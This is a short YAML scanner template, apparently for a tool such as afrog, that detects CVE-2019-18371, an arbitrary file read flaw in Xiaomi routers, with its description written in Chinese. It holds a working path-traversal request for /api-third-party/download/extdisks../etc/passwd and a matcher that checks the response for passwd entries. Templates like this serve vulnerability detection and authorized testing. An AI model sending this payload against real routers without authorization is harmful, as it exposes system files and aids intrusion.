漏洞描述
小米 路由器存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器敏感信息
app="小米路由器"
id: CVE-2019-18371
info:
name: 小米 路由器 extdisks 任意文件读取漏洞
author: zan8in
severity: high
description: |
小米 路由器存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器敏感信息
app="小米路由器"
reference:
- http://wiki.peiqi.tech/wiki/iot/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E8%B7%AF%E7%94%B1%E5%99%A8%20extdisks%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2019-18371.html
rules:
r0:
request:
method: GET
path: /api-third-party/download/extdisks../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()